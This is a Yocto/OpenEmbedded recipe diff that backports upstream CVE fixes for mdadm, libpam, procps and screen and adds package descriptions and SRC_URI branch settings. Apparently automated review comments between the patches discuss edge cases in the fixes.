3 | LICENSE = "GPLv3" | 4 | LICENSE = "GPLv3" |
4 | LIC_FILES_CHKSUM = "file://COPYING;md5=270bbafe360e73f9840bd7981621f9c2" | 5 | LIC_FILES_CHKSUM = "file://COPYING;md5=270bbafe360e73f9840bd7981621f9c2" |
5 | SECTION = "console/utils" | 6 | SECTION = "console/utils" |
diff --git a/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch new file mode 100644 index 0000000000..8e0a06cbc7 --- /dev/null +++ b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch | |||
@@ -0,0 +1,77 @@ | |||
1 | From ced5fa8b170ad448f4076e24a10c731b5cfb36ce Mon Sep 17 00:00:00 2001 | ||
2 | From: Blazej Kucman <blazej.kucman@intel.com> | ||
3 | Date: Fri, 3 Dec 2021 15:31:15 +0100 | ||
4 | Subject: mdadm: block creation with long names | ||
5 | |||
6 | This fixes buffer overflows in create_mddev(). It prohibits | ||
7 | creation with not supported names for DDF and native. For IMSM, | ||
8 | mdadm will do silent cut to 16 later. | ||
9 | |||
10 | Signed-off-by: Mariusz Tkaczyk <mariusz.tkaczyk@linux.intel.com> | ||
11 | Signed-off-by: Blazej Kucman <blazej.kucman@intel.com> | ||
12 | Signed-off-by: Jes Sorensen <jsorensen@fb.com> | ||
13 | --- | ||
14 | |||
15 | Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=ced5fa8b170ad448f4076e24a10c731b5cfb36ce] | ||
16 | CVE: CVE-2023-28736 | ||
17 | Signed-off-by: Ashish Sharma <asharma@mvista.com> | ||
18 | |||
19 | mdadm.8.in | 5 +++++ | ||
20 | mdadm.c | 9 ++++++++- | ||
21 | mdadm.h | 5 +++++ | ||
22 | 3 files changed, 18 insertions(+), 1 deletion(-) | ||
23 | |||
24 | diff --git a/mdadm.8.in b/mdadm.8.in | ||
25 | index 28d773c2..68e100cb 100644 | ||
26 | --- a/mdadm.8.in | ||
27 | +++ b/mdadm.8.in | ||
28 | @@ -2186,6 +2186,11 @@ is run, but will be created by | ||
29 | .I udev | ||
30 | once the array becomes active. | ||
31 | |||
32 | +The max length md-device name is limited to 32 characters. | ||
33 | +Different metadata types have more strict limitation | ||
34 | +(like IMSM where only 16 characters are allowed). | ||
35 | +For that reason, long name could be truncated or rejected, it depends on metadata policy. | ||
36 | + | ||
37 | As devices are added, they are checked to see if they contain RAID | ||
38 | superblocks or filesystems. They are also checked to see if the variance in | ||
39 | device size exceeds 1%. | ||
40 | diff --git a/mdadm.c b/mdadm.c | ||
41 | index 91e67467..26299b2e 100644 | ||
42 | --- a/mdadm.c | ||
43 | +++ b/mdadm.c | ||
44 | @@ -1359,9 +1359,16 @@ int main(int argc, char *argv[]) | ||
45 | mdfd = open_mddev(devlist->devname, 1); | ||
46 | if (mdfd < 0) | ||
47 | exit(1); | ||
48 | - } else | ||
49 | + } else { | ||
50 | + char *bname = basename(devlist->devname); | ||
51 | + | ||
52 | + if (strlen(bname) > MD_NAME_MAX) { | ||
53 | + pr_err("Name %s is too long.\n", devlist->devname); | ||
54 | + exit(1); | ||
55 | + } | ||
56 | /* non-existent device is OK */ | ||
57 | mdfd = open_mddev(devlist->devname, 0); | ||
58 | + } | ||
59 | if (mdfd == -2) { | ||
60 | pr_err("device %s exists but is not an md array.\n", devlist->devname); | ||
61 | exit(1); | ||
62 | diff --git a/mdadm.h b/mdadm.h | ||
63 | index 54567396..c7268a71 100644 | ||
64 | --- a/mdadm.h | ||
65 | +++ b/mdadm.h | ||
66 | @@ -1880,3 +1880,8 @@ enum r0layout { | ||
67 | #define INVALID_SECTORS 1 | ||
68 | /* And another special number needed for --data_offset=variable */ | ||
69 | #define VARIABLE_OFFSET 3 | ||
70 | + | ||
71 | +/** | ||
72 | + * This is true for native and DDF, IMSM allows 16. | ||
73 | + */ | ||
74 | +#define MD_NAME_MAX 32 | ||
75 | -- | ||
76 | cgit | ||
77 | |||
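Review bot: The new length check in `main()` calls `basename(devlist->devname)` and then passes `devlist->devname` to `open_mddev()` a few lines later; the POSIX variant of `basename()` is permitted to modify its argument, and which variant is in effect depends on headers and the C library, neither of which this hunk shows. If the POSIX one is used (presumably the case on musl — confirm), a name with a trailing slash could be altered before it is opened. Locating the last `/` without touching the string avoids the dependency, e.g. `const char *bname = strrchr(devlist->devname, '/'); bname = bname ? bname + 1 : devlist->devname;`. The `Upstream-Status` and `CVE` tags also sit below the `---` separator, where `git am` discards them; moving them above it keeps them in the commit message. `main()` starts and ends outside the hunk.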
diff --git a/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch new file mode 100644 index 0000000000..1e2990d79a --- /dev/null +++ b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch | |||
@@ -0,0 +1,80 @@ | |||
1 | From 7d374a1869d3a84971d027a7f4233878c8f25a62 Mon Sep 17 00:00:00 2001 | ||
2 | From: Mateusz Grzonka <mateusz.grzonka@intel.com> | ||
3 | Date: Tue, 27 Jul 2021 10:25:18 +0200 | ||
4 | Subject: Fix memory leak after "mdadm --detail" | ||
5 | |||
6 | Signed-off-by: Mateusz Grzonka <mateusz.grzonka@intel.com> | ||
7 | Signed-off-by: Jes Sorensen <jsorensen@fb.com> | ||
8 | --- | ||
9 | Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=7d374a1869d3a84971d027a7f4233878c8f25a62] | ||
10 | CVE: CVE-2023-28938 | ||
11 | Signed-off-by: Ashish Sharma <asharma@mvista.com> | ||
12 | |||
13 | Detail.c | 20 +++++++++----------- | ||
14 | 1 file changed, 9 insertions(+), 11 deletions(-) | ||
15 | |||
16 | diff --git a/Detail.c b/Detail.c | ||
17 | index ad56344f..d3af0ab5 100644 | ||
18 | --- a/Detail.c | ||
19 | +++ b/Detail.c | ||
20 | @@ -66,11 +66,11 @@ int Detail(char *dev, struct context *c) | ||
21 | int spares = 0; | ||
22 | struct stat stb; | ||
23 | int failed = 0; | ||
24 | - struct supertype *st; | ||
25 | + struct supertype *st = NULL; | ||
26 | char *subarray = NULL; | ||
27 | int max_disks = MD_SB_DISKS; /* just a default */ | ||
28 | struct mdinfo *info = NULL; | ||
29 | - struct mdinfo *sra; | ||
30 | + struct mdinfo *sra = NULL; | ||
31 | struct mdinfo *subdev; | ||
32 | char *member = NULL; | ||
33 | char *container = NULL; | ||
34 | @@ -93,8 +93,7 @@ int Detail(char *dev, struct context *c) | ||
35 | if (!sra) { | ||
36 | if (md_get_array_info(fd, &array)) { | ||
37 | pr_err("%s does not appear to be an md device\n", dev); | ||
38 | - close(fd); | ||
39 | - return rv; | ||
40 | + goto out; | ||
41 | } | ||
42 | } | ||
43 | external = (sra != NULL && sra->array.major_version == -1 && | ||
44 | @@ -108,16 +107,13 @@ int Detail(char *dev, struct context *c) | ||
45 | sra->devs == NULL) { | ||
46 | pr_err("Array associated with md device %s does not exist.\n", | ||
47 | dev); | ||
48 | - close(fd); | ||
49 | - sysfs_free(sra); | ||
50 | - return rv; | ||
51 | + goto out; | ||
52 | } | ||
53 | array = sra->array; | ||
54 | } else { | ||
55 | pr_err("cannot get array detail for %s: %s\n", | ||
56 | dev, strerror(errno)); | ||
57 | - close(fd); | ||
58 | - return rv; | ||
59 | + goto out; | ||
60 | } | ||
61 | } | ||
62 | |||
63 | @@ -827,10 +823,12 @@ out: | ||
64 | close(fd); | ||
65 | free(subarray); | ||
66 | free(avail); | ||
67 | - for (d = 0; d < n_devices; d++) | ||
68 | - free(devices[d]); | ||
69 | + if (devices) | ||
70 | + for (d = 0; d < n_devices; d++) | ||
71 | + free(devices[d]); | ||
72 | free(devices); | ||
73 | sysfs_free(sra); | ||
74 | + free(st); | ||
75 | return rv; | ||
76 | } | ||
77 | |||
78 | -- | ||
79 | cgit | ||
80 | |||
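Review bot: The early error paths in `Detail()` now `goto out`, so the cleanup at `out:` may run before `avail`, `devices` and `n_devices` have been assigned, and only `st`, `sra` and `subarray` are visibly initialised to `NULL` in these hunks. The declarations of the other three are outside the visible context, so for this backport onto mdadm 4.1 it should be confirmed that they start as `NULL`/`0`; otherwise `free(avail)` and `free(devices)` would act on indeterminate pointers. The added `if (devices)` guard suggests `devices` can be `NULL` at that point, which is consistent but not proof. `free(st)` releases only the struct itself; whether `st` owns further allocations is not visible here. `Detail()` starts and ends outside the hunks.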
diff --git a/meta/recipes-extended/mdadm/mdadm_4.1.bb b/meta/recipes-extended/mdadm/mdadm_4.1.bb index 001d3331a7..ca326fd1cb 100644 --- a/meta/recipes-extended/mdadm/mdadm_4.1.bb +++ b/meta/recipes-extended/mdadm/mdadm_4.1.bb | |||
@@ -1,5 +1,6 @@ | |||
1 | SUMMARY = "Tool for managing software RAID under Linux" | 1 | SUMMARY = "Tool for managing software RAID under Linux" |
2 | HOMEPAGE = "http://www.kernel.org/pub/linux/utils/raid/mdadm/" | 2 | HOMEPAGE = "http://www.kernel.org/pub/linux/utils/raid/mdadm/" |
3 | DESCRIPTION = "mdadm is a Linux utility used to manage and monitor software RAID devices." | ||
3 | 4 | ||
4 | # Some files are GPLv2+ while others are GPLv2. | 5 | # Some files are GPLv2+ while others are GPLv2. |
5 | LICENSE = "GPLv2 & GPLv2+" | 6 | LICENSE = "GPLv2 & GPLv2+" |
@@ -23,6 +24,8 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/utils/raid/mdadm/${BPN}-${PV}.tar.xz \ | |||
23 | file://0001-mdadm-add-option-y-for-use-syslog-to-recive-event-re.patch \ | 24 | file://0001-mdadm-add-option-y-for-use-syslog-to-recive-event-re.patch \ |
24 | file://include_sysmacros.patch \ | 25 | file://include_sysmacros.patch \ |
25 | file://0001-mdadm-skip-test-11spare-migration.patch \ | 26 | file://0001-mdadm-skip-test-11spare-migration.patch \ |
27 | file://CVE-2023-28736.patch \ | ||
28 | file://CVE-2023-28938.patch \ | ||
26 | " | 29 | " |
27 | 30 | ||
28 | SRC_URI[md5sum] = "51bf3651bd73a06c413a2f964f299598" | 31 | SRC_URI[md5sum] = "51bf3651bd73a06c413a2f964f299598" |
diff --git a/meta/recipes-extended/mingetty/mingetty_1.08.bb b/meta/recipes-extended/mingetty/mingetty_1.08.bb index 491b892093..9822e86b0e 100644 --- a/meta/recipes-extended/mingetty/mingetty_1.08.bb +++ b/meta/recipes-extended/mingetty/mingetty_1.08.bb | |||
@@ -1,6 +1,7 @@ | |||
1 | SUMMARY = "Compact getty terminal handler for virtual consoles only" | 1 | SUMMARY = "Compact getty terminal handler for virtual consoles only" |
2 | SECTION = "console/utils" | 2 | SECTION = "console/utils" |
3 | HOMEPAGE = "http://sourceforge.net/projects/mingetty/" | 3 | HOMEPAGE = "http://sourceforge.net/projects/mingetty/" |
4 | DESCRIPTION = "This is a small Linux console getty that is started on the Linux text console, asks for a login name and then tranfers over to login directory. Is extended to allow automatic login and starting any app." | ||
4 | LICENSE = "GPLv2" | 5 | LICENSE = "GPLv2" |
5 | PR = "r3" | 6 | PR = "r3" |
6 | 7 | ||
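--- a/meta/recipes-extended/newt/libnewt_0.52.21.bb
+++ b/meta/recipes-extended/newt/libnewt_0.52.21.bb
@@ -29,7 +29,7 @@ SRC_URI[sha256sum] = "265eb46b55d7eaeb887fca7a1d51fe115658882dfe148164b6c49fccac
 
 S = "${WORKDIR}/newt-${PV}"
 
-inherit autotools-brokensep python3native python3-dir
+inherit autotools-brokensep python3native python3-dir python3targetconfig
 
 EXTRA_OECONF = "--without-tcl --with-python"
 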
diff --git a/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch new file mode 100644 index 0000000000..33ac37b7f0 --- /dev/null +++ b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch | |||
@@ -0,0 +1,59 @@ | |||
1 | From 031bb5a5d0d950253b68138b498dc93be69a64cb Mon Sep 17 00:00:00 2001 | ||
2 | From: Matthias Gerstner <matthias.gerstner@suse.de> | ||
3 | Date: Wed, 27 Dec 2023 14:01:59 +0100 | ||
4 | Subject: [PATCH] pam_namespace: protect_dir(): use O_DIRECTORY to prevent | ||
5 | local DoS situations | ||
6 | |||
7 | Without O_DIRECTORY the path crawling logic is subject to e.g. FIFOs | ||
8 | being placed in user controlled directories, causing the PAM module to | ||
9 | block indefinitely during `openat()`. | ||
10 | |||
11 | Pass O_DIRECTORY to cause the `openat()` to fail if the path does not | ||
12 | refer to a directory. | ||
13 | |||
14 | With this the check whether the final path element is a directory | ||
15 | becomes unnecessary, drop it. | ||
16 | |||
17 | Upstream-Status: Backport [https://github.com/linux-pam/linux-pam/commit/031bb5a5d0d950253b68138b498dc93be69a64cb] | ||
18 | CVE: CVE-2024-22365 | ||
19 | Signed-off-by: Vijay Anusuri <vanusuri@mvista.com> | ||
20 | --- | ||
21 | modules/pam_namespace/pam_namespace.c | 18 +----------------- | ||
22 | 1 file changed, 1 insertion(+), 17 deletions(-) | ||
23 | |||
24 | diff --git a/modules/pam_namespace/pam_namespace.c b/modules/pam_namespace/pam_namespace.c | ||
25 | index 2528cff86..f72d67189 100644 | ||
26 | --- a/modules/pam_namespace/pam_namespace.c | ||
27 | +++ b/modules/pam_namespace/pam_namespace.c | ||
28 | @@ -1201,7 +1201,7 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir, | ||
29 | int dfd = AT_FDCWD; | ||
30 | int dfd_next; | ||
31 | int save_errno; | ||
32 | - int flags = O_RDONLY; | ||
33 | + int flags = O_RDONLY | O_DIRECTORY; | ||
34 | int rv = -1; | ||
35 | struct stat st; | ||
36 | |||
37 | @@ -1255,22 +1255,6 @@ static int protect_dir(const char *path, mode_t mode, int do_mkdir, | ||
38 | rv = openat(dfd, dir, flags); | ||
39 | } | ||
40 | |||
41 | - if (rv != -1) { | ||
42 | - if (fstat(rv, &st) != 0) { | ||
43 | - save_errno = errno; | ||
44 | - close(rv); | ||
45 | - rv = -1; | ||
46 | - errno = save_errno; | ||
47 | - goto error; | ||
48 | - } | ||
49 | - if (!S_ISDIR(st.st_mode)) { | ||
50 | - close(rv); | ||
51 | - errno = ENOTDIR; | ||
52 | - rv = -1; | ||
53 | - goto error; | ||
54 | - } | ||
55 | - } | ||
56 | - | ||
57 | if (flags & O_NOFOLLOW) { | ||
58 | /* we are inside user-owned dir - protect */ | ||
59 | if (protect_mount(rv, p, idata) == -1) { | ||
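Review bot: The whole fix now rests on the `O_DIRECTORY` bit in `int flags = O_RDONLY | O_DIRECTORY;`, and the code carries no comment saying so, so a later cleanup could drop the flag and bring the blocking `openat()` back. A why-comment on that line, such as `/* O_DIRECTORY: make openat() fail on a FIFO or other non-directory instead of blocking */`, records the reason given in the commit message. With the `fstat()`/`S_ISDIR` block removed, `struct stat st;` (still declared in the first hunk's context) may no longer be used in `protect_dir()`; if nothing outside the hunks reads it, it should be removed as well. `protect_dir()` starts and ends outside the hunks.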
diff --git a/meta/recipes-extended/pam/libpam_1.3.1.bb b/meta/recipes-extended/pam/libpam_1.3.1.bb index bc72afe6ad..527a368e2d 100644 --- a/meta/recipes-extended/pam/libpam_1.3.1.bb +++ b/meta/recipes-extended/pam/libpam_1.3.1.bb | |||
@@ -24,6 +24,7 @@ SRC_URI = "https://github.com/linux-pam/linux-pam/releases/download/v${PV}/Linux | |||
24 | file://pam-security-abstract-securetty-handling.patch \ | 24 | file://pam-security-abstract-securetty-handling.patch \ |
25 | file://pam-unix-nullok-secure.patch \ | 25 | file://pam-unix-nullok-secure.patch \ |
26 | file://crypt_configure.patch \ | 26 | file://crypt_configure.patch \ |
27 | file://CVE-2024-22365.patch \ | ||
27 | " | 28 | " |
28 | 29 | ||
29 | SRC_URI[md5sum] = "558ff53b0fc0563ca97f79e911822165" | 30 | SRC_URI[md5sum] = "558ff53b0fc0563ca97f79e911822165" |
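--- a/meta/recipes-extended/parted/parted_3.3.bb
+++ b/meta/recipes-extended/parted/parted_3.3.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Disk partition editing/resizing utility"
 HOMEPAGE = "http://www.gnu.org/software/parted/parted.html"
+DESCRIPTION = "GNU Parted manipulates partition tables. This is useful for creating space for new operating systems, reorganizing disk usage, copying data on hard disks and disk imaging."
 LICENSE = "GPLv3+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=2f31b266d3440dd7ee50f92cf67d8e6c"
 SECTION = "console/tools"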
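--- a/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
+++ b/meta/recipes-extended/perl/libconvert-asn1-perl_0.27.bb
@@ -1,5 +1,7 @@
 SUMMARY = "Convert::ASN1 - Perl ASN.1 Encode/Decode library"
 SECTION = "libs"
+HOMEPAGE = "https://metacpan.org/source/GBARR/Convert-ASN1-0.27"
+DESCRIPTION = "Convert::ASN1 is a perl library for encoding/decoding data using ASN.1 definitions."
 LICENSE = "Artistic-1.0 | GPL-1.0+"
 LIC_FILES_CHKSUM = "file://README.md;beginline=91;endline=97;md5=ceff7fd286eb6d8e8e0d3d23e096a63f"
 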
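--- a/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
+++ b/meta/recipes-extended/perl/libtimedate-perl_2.30.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Perl modules useful for manipulating date and time information"
 HOMEPAGE = "https://metacpan.org/release/TimeDate"
+DESCRIPTION = "This is the perl5 TimeDate distribution. It requires perl version 5.003 or later."
 SECTION = "libs"
 # You can redistribute it and/or modify it under the same terms as Perl itself.
 LICENSE = "Artistic-1.0 | GPL-1.0+"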
diff --git a/meta/recipes-extended/procps/procps/CVE-2023-4016.patch b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch new file mode 100644 index 0000000000..50582a8649 --- /dev/null +++ b/meta/recipes-extended/procps/procps/CVE-2023-4016.patch | |||
@@ -0,0 +1,85 @@ | |||
1 | From 2c933ecba3bb1d3041a5a7a53a7b4078a6003413 Mon Sep 17 00:00:00 2001 | ||
2 | From: Craig Small <csmall@dropbear.xyz> | ||
3 | Date: Thu, 10 Aug 2023 21:18:38 +1000 | ||
4 | Subject: [PATCH] ps: Fix possible buffer overflow in -C option | ||
5 | |||
6 | ps allocates memory using malloc(length of arg * len of struct). | ||
7 | In certain strange circumstances, the arg length could be very large | ||
8 | and the multiplecation will overflow, allocating a small amount of | ||
9 | memory. | ||
10 | |||
11 | Subsequent strncpy() will then write into unallocated memory. | ||
12 | The fix is to use calloc. It's slower but this is a one-time | ||
13 | allocation. Other malloc(x * y) calls have also been replaced | ||
14 | by calloc(x, y) | ||
15 | |||
16 | References: | ||
17 | https://www.freelists.org/post/procps/ps-buffer-overflow-CVE-20234016 | ||
18 | https://nvd.nist.gov/vuln/detail/CVE-2023-4016 | ||
19 | https://gitlab.com/procps-ng/procps/-/issues/297 | ||
20 | https://bugs.debian.org/1042887 | ||
21 | |||
22 | Signed-off-by: Craig Small <csmall@dropbear.xyz> | ||
23 | |||
24 | CVE: CVE-2023-4016 | ||
25 | Upstream-Status: Backport [https://gitlab.com/procps-ng/procps/-/commit/2c933ecba3bb1d3041a5a7a53a7b4078a6003413] | ||
26 | |||
27 | Signed-off-by: Peter Marko <peter.marko@siemens.com> | ||
28 | |||
29 | --- | ||
30 | NEWS | 1 + | ||
31 | ps/parser.c | 8 ++++---- | ||
32 | 2 files changed, 5 insertions(+), 4 deletions(-) | ||
33 | |||
34 | diff --git a/NEWS b/NEWS | ||
35 | index b9509734..64fa3da8 100644 | ||
36 | --- a/NEWS | ||
37 | +++ b/NEWS | ||
38 | @@ -1,3 +1,5 @@ | ||
39 | + * ps: Fix buffer overflow in -C option CVE-2023-4016 Debian #1042887, issue #297 | ||
40 | + | ||
41 | procps-ng-3.3.16 | ||
42 | ---------------- | ||
43 | * library: Increment to 8:2:0 | ||
44 | diff --git a/ps/parser.c b/ps/parser.c | ||
45 | index 248aa741..15873dfa 100644 | ||
46 | --- a/ps/parser.c | ||
47 | +++ b/ps/parser.c | ||
48 | @@ -184,7 +184,6 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s | ||
49 | const char *err; /* error code that could or did happen */ | ||
50 | /*** prepare to operate ***/ | ||
51 | node = malloc(sizeof(selection_node)); | ||
52 | - node->u = malloc(strlen(arg)*sizeof(sel_union)); /* waste is insignificant */ | ||
53 | node->n = 0; | ||
54 | buf = strdup(arg); | ||
55 | /*** sanity check and count items ***/ | ||
56 | @@ -205,6 +204,7 @@ static const char *parse_list(const char *arg, const char *(*parse_fn)(char *, s | ||
57 | } while (*++walk); | ||
58 | if(need_item) goto parse_error; | ||
59 | node->n = items; | ||
60 | + node->u = calloc(items, sizeof(sel_union)); | ||
61 | /*** actually parse the list ***/ | ||
62 | walk = buf; | ||
63 | while(items--){ | ||
64 | @@ -1031,15 +1031,15 @@ static const char *parse_trailing_pids(void){ | ||
65 | thisarg = ps_argc - 1; /* we must be at the end now */ | ||
66 | |||
67 | pidnode = malloc(sizeof(selection_node)); | ||
68 | - pidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */ | ||
69 | + pidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */ | ||
70 | pidnode->n = 0; | ||
71 | |||
72 | grpnode = malloc(sizeof(selection_node)); | ||
73 | - grpnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */ | ||
74 | + grpnode->u = calloc(i,sizeof(sel_union)); /* waste is insignificant */ | ||
75 | grpnode->n = 0; | ||
76 | |||
77 | sidnode = malloc(sizeof(selection_node)); | ||
78 | - sidnode->u = malloc(i*sizeof(sel_union)); /* waste is insignificant */ | ||
79 | + sidnode->u = calloc(i, sizeof(sel_union)); /* waste is insignificant */ | ||
80 | sidnode->n = 0; | ||
81 | |||
82 | while(i--){ | ||
83 | -- | ||
84 | GitLab | ||
85 | |||
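Review bot: In parse_list, `node->u` is no longer assigned before the sanity loop, yet `if(need_item) goto parse_error;` (patch line 58) can still jump out before the new `calloc` on patch line 60. The parse_error label lies outside the hunk; if it frees `node->u`, as cleanup code of this shape usually does, it would now free an uninitialised pointer taken from the preceding `malloc(sizeof(selection_node))`. Putting `node->u = NULL;` where the removed malloc stood makes that path safe. The `calloc` results here and in parse_trailing_pids are also used without a NULL check.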
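--- a/meta/recipes-extended/procps/procps_3.3.16.bb
+++ b/meta/recipes-extended/procps/procps_3.3.16.bb
@@ -12,8 +12,9 @@ DEPENDS = "ncurses"
 
 inherit autotools gettext pkgconfig update-alternatives
 
-SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https \
+SRC_URI = "git://gitlab.com/procps-ng/procps.git;protocol=https;branch=master \
 file://sysctl.conf \
+file://CVE-2023-4016.patch \
 "
 SRCREV = "59c88e18f29000ceaf7e5f98181b07be443cf12f"
 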
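--- a/meta/recipes-extended/psmisc/psmisc_23.3.bb
+++ b/meta/recipes-extended/psmisc/psmisc_23.3.bb
@@ -2,7 +2,7 @@ require psmisc.inc
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3"
 
-SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https \
+SRC_URI = "git://gitlab.com/psmisc/psmisc.git;protocol=https;branch=master \
 file://0001-Use-UINTPTR_MAX-instead-of-__WORDSIZE.patch \
 "
 SRCREV = "78bde849041e6c914a2a517ebe1255b86dc98772"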
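--- a/meta/recipes-extended/quota/quota_4.05.bb
+++ b/meta/recipes-extended/quota/quota_4.05.bb
@@ -1,6 +1,7 @@
 SUMMARY = "Tools for monitoring & limiting user disk usage per filesystem"
 SECTION = "base"
 HOMEPAGE = "http://sourceforge.net/projects/linuxquota/"
+DESCRIPTION = "Tools and patches for the Linux Diskquota system as part of the Linux kernel"
 BUGTRACKER = "http://sourceforge.net/tracker/?group_id=18136&atid=118136"
 LICENSE = "BSD & GPLv2+ & LGPLv2.1+"
 LIC_FILES_CHKSUM = "file://rquota_server.c;beginline=1;endline=20;md5=fe7e0d7e11c6f820f8fa62a5af71230f \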
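--- a/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
+++ b/meta/recipes-extended/rpcsvc-proto/rpcsvc-proto.bb
@@ -19,7 +19,7 @@ PV = "1.4+git${SRCPV}"
 
 SRCREV = "9bc3b5b785723cfff459b0c01b39d87d4bed975c"
 
-SRC_URI = "git://github.com/thkukuk/${BPN} \
+SRC_URI = "git://github.com/thkukuk/${BPN};branch=master;protocol=https \
 file://0001-Use-cross-compiled-rpcgen.patch \
 "
 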
diff --git a/meta/recipes-extended/screen/screen/CVE-2021-26937.patch b/meta/recipes-extended/screen/screen/CVE-2021-26937.patch new file mode 100644 index 0000000000..983b35c1b0 --- /dev/null +++ b/meta/recipes-extended/screen/screen/CVE-2021-26937.patch | |||
@@ -0,0 +1,68 @@ | |||
1 | Description: [CVE-2021-26937] Fix out of bounds array access | ||
2 | Author: Michael Schröder <mls@suse.de> | ||
3 | Bug-Debian: https://bugs.debian.org/982435 | ||
4 | Bug: https://savannah.gnu.org/bugs/?60030 | ||
5 | Bug: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00000.html | ||
6 | Bug-OSS-Security: https://www.openwall.com/lists/oss-security/2021/02/09/3 | ||
7 | Origin: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00010.html | ||
8 | |||
9 | CVE: CVE-2021-26937 | ||
10 | Upstream-Status: Pending | ||
11 | Signed-off-by: Scott Murray <scott.murray@konsulko.com> | ||
12 | |||
13 | --- a/encoding.c | ||
14 | +++ b/encoding.c | ||
15 | @@ -43,7 +43,7 @@ | ||
16 | # ifdef UTF8 | ||
17 | static int recode_char __P((int, int, int)); | ||
18 | static int recode_char_to_encoding __P((int, int)); | ||
19 | -static void comb_tofront __P((int, int)); | ||
20 | +static void comb_tofront __P((int)); | ||
21 | # ifdef DW_CHARS | ||
22 | static int recode_char_dw __P((int, int *, int, int)); | ||
23 | static int recode_char_dw_to_encoding __P((int, int *, int)); | ||
24 | @@ -1263,6 +1263,8 @@ | ||
25 | {0x30000, 0x3FFFD}, | ||
26 | }; | ||
27 | |||
28 | + if (c >= 0xdf00 && c <= 0xdfff) | ||
29 | + return 1; /* dw combining sequence */ | ||
30 | return ((bisearch(c, wide, sizeof(wide) / sizeof(struct interval) - 1)) || | ||
31 | (cjkwidth && | ||
32 | bisearch(c, ambiguous, | ||
33 | @@ -1330,11 +1332,12 @@ | ||
34 | } | ||
35 | |||
36 | static void | ||
37 | -comb_tofront(root, i) | ||
38 | -int root, i; | ||
39 | +comb_tofront(i) | ||
40 | +int i; | ||
41 | { | ||
42 | for (;;) | ||
43 | { | ||
44 | + int root = i >= 0x700 ? 0x801 : 0x800; | ||
45 | debug1("bring to front: %x\n", i); | ||
46 | combchars[combchars[i]->prev]->next = combchars[i]->next; | ||
47 | combchars[combchars[i]->next]->prev = combchars[i]->prev; | ||
48 | @@ -1396,9 +1399,9 @@ | ||
49 | { | ||
50 | /* full, recycle old entry */ | ||
51 | if (c1 >= 0xd800 && c1 < 0xe000) | ||
52 | - comb_tofront(root, c1 - 0xd800); | ||
53 | + comb_tofront(c1 - 0xd800); | ||
54 | i = combchars[root]->prev; | ||
55 | - if (c1 == i + 0xd800) | ||
56 | + if (i == 0x800 || i == 0x801 || c1 == i + 0xd800) | ||
57 | { | ||
58 | /* completely full, can't recycle */ | ||
59 | debug("utf8_handle_comp: completely full!\n"); | ||
60 | @@ -1422,7 +1425,7 @@ | ||
61 | mc->font = (i >> 8) + 0xd8; | ||
62 | mc->fontx = 0; | ||
63 | debug3("combinig char %x %x -> %x\n", c1, c, i + 0xd800); | ||
64 | - comb_tofront(root, i); | ||
65 | + comb_tofront(i); | ||
66 | } | ||
67 | |||
68 | #else /* !UTF8 */ | ||
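Review bot: The new `int root = i >= 0x700 ? 0x801 : 0x800;` in comb_tofront and the `i == 0x800 || i == 0x801` test in the recycle path repeat three bare constants whose relation the reader has to work out. From the hunks, 0x700 is 0xdf00 - 0xd800, the start of the range the width function now labels as a double-width combining sequence, so 0x801 appears to be the list head for those entries and 0x800 the head for the rest. A comment such as `/* 0x800 / 0x801: list heads for single- and double-width combining entries; i >= 0x700 selects the dw list */` above the `root` assignment would record that, or the values could be named with `#define`s. Several of the enclosing functions begin outside the hunks.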
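--- /dev/null
+++ b/meta/recipes-extended/screen/screen/CVE-2023-24626.patch
@@ -0,0 +1,40 @@
+From e9ad41bfedb4537a6f0de20f00b27c7739f168f7 Mon Sep 17 00:00:00 2001
+From: Alexander Naumov <alexander_naumov@opensuse.org>
+Date: Mon, 30 Jan 2023 17:22:25 +0200
+Subject: fix: missing signal sending permission check on failed query messages
+
+Signed-off-by: Alexander Naumov <alexander_naumov@opensuse.org>
+
+CVE: CVE-2023-24626
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/screen.git/commit/?id=e9ad41bfedb4537a6f0de20f00b27c7739f168f7]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+socket.c | 9 +++++++--
+1 file changed, 7 insertions(+), 2 deletions(-)
+
+diff --git a/socket.c b/socket.c
+index bb68b35..9d87445 100644
+--- a/socket.c
++++ b/socket.c
+@@ -1285,11 +1285,16 @@ ReceiveMsg()
+else
+queryflag = -1;
+
+- Kill(m.m.command.apid,
++ if (CheckPid(m.m.command.apid)) {
++ Msg(0, "Query attempt with bad pid(%d)!", m.m.command.apid);
++ }
++ else {
++ Kill(m.m.command.apid,
+(queryflag >= 0)
+? SIGCONT
+: SIG_BYE); /* Send SIG_BYE if an error happened */
+- queryflag = -1;
++ queryflag = -1;
++ }
+}
+break;
+case MSG_COMMAND:
+--
+2.25.1
+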
